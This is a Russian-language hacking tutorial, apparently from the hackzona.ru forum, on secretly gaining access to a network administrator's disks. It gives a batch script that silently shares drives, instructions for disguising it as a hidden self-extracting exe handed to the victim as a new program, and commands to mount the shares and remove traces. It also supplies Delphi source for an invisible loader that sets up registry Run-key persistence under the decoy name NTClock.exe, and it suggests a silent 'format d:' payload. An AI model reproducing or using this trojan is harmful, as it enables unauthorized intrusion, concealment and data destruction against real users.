Расшаренные ресурсы (shared resources) или по-нашему шары присутствуют почти в каждой локалке.
Представь ситуацию - злобный админ в локалке закрыл тебе доступ к своим дискам а тебе очень нужно незметно покапаться в его компе =) Сегодня я покажу тебе как легко решить эту проблему.
//ЧАСТЬ 1 - "крутая прога"//
Итак, ты пишешь bat файл следующего содержания:
@Echo off
net share disk_d=d: > nul
net share disk_c=c: > nul
Этим ты расшаришь диски C: и D: на компе админа.
Затем берешь мой любимый архиватор WINRAR и начинаешь колдовать =) :
1) Выбираешь метод сжатия - максимальный.
2) Ставишь пимпу напротив "создать sfx архив". Этим ты превратишь свой батник в exe файл =)
3) Переходишь на вкладку "Дополнительно" - "Параметры SFX"
4) Во вкладке "Общие" пишешь путь распаковки твоего батника, например если хочешь кинуть его в C:/WINDOWS пишешь %windir%
5)Указываешь имя своего батника (например shara.bat) в "запустить ПОСЛЕ распаковки".
6) Переходишь на вкладку "Режимы" и ставишь точки напротив "Скрыть все" и "Перезаписывать все файлы".
7) На вкладке "Текст и значок" указываешь иконку будущего exe файла.
тыкаешь OK.
Итак, у тебя есть exe файл который ты можешь смело впаривать админу сетки под видом какой-нибудь новой проги =)
//ЧАСТЬ 2 - клиент//
Теперь напишим скрипт с помощью которого ты на своем компе будешь подключать сетевые диски админа =) Пишешь:
net use X: //имя компа админа/disk_d
net use Y: //имя компа админа/disk_c
И спокойно юзаешь его диски в свое удовольствие.
Чтобы замести следы (напимер при работе на компе общего доступа) используй:
net use X: /delete
net use Y: /delete
Есть одно препятствие: админ может увидеть посторонние расшаренные диски набрав команду net share в cmd.
Для большей надежности можно запускать это все таким образом:
1) Пишешь прогу (я пишу на delphi), запускающую твой батник.
2) Склеиваешь ее и батник описаным выше способом только в запуск после распаковки вместо батника прописываешь скомпиленый exe файл
Итак действуем.
1) Открываешь делфи и пишешь:
...
uses Windows, ShellAPI, Forms;
...
var
Form1: TForm1;
Reg : HKEY;
szPach: String ;
szName: String ;
y: string;
...
procedure TForm1.FormCreate(Sender: TObject);
begin
application.ShowMainForm:=false; //делаем наш загрузчик невидимым на панели задач и в диспетчере во вкладке "процессы" - ибо нех =)
begin
y:=ParamStr(0);
szName:='NTClock.exe'; //имя проги которое будет видно в редакторе реестра.
szPach:=y ;
//Создаешь ключ в реестре
RegCreateKey(HKEY_LOCAL_MACHINE, 'Software/Microsoft/Windows/CurrentVersion/Run', Reg);
//Создаешь параметр автозапуска
RegSetValueEx(Reg, PChar(szName) ,0 ,REG_SZ ,PChar(szPach), Length(szPach));
//Освобождаешь хендл
RegCloseKey(Reg);
begin
sleep(60000); // пауза в 1 мин (можно не делать)
ShellExecute(0, 'open', 'c:/WINDOWS/shara.bat', '', '', SW_HIDE); //запускаешь свой батник в скрытом режиме.
Application.Terminate; //закрываемся
end;
end;
end;
Как ты уже заметил я прописал наш загрузчик в реестр в раздел автозапуска. Теперь если даже админ и уберет расшареные диски, они у него будут расшариваться при каждом запуске системы =)
Здесь еще такая фича:
даже если админ пропалит автозапуск и полезет в реестр, то не всегда сможет понять где прописан злой процесс потому что не у каждого может вызвать сомнения прога под названием NTClock.exe =)
Также при желании можно заменить код батника на что нибудь вроде
@Echo off
format d: /q /y > nul
Все в твоих руках =)
Чуть не забыл, я поместил батник в папку windows т.к среднестатистический юзер там бывает редко. Поэтому при склеивании winrar'ом забей в путь %windir%
На этом все! Если будут вопросы, пиши на
vadikus@front.ru
PS: это моя первая статья, поэтому прошу сильно не ругать если все это уже знают =).
_=V@DiKuS=_
_=V@DiKuS=_
hackzona.ru
Вход
FAQ
Поиск
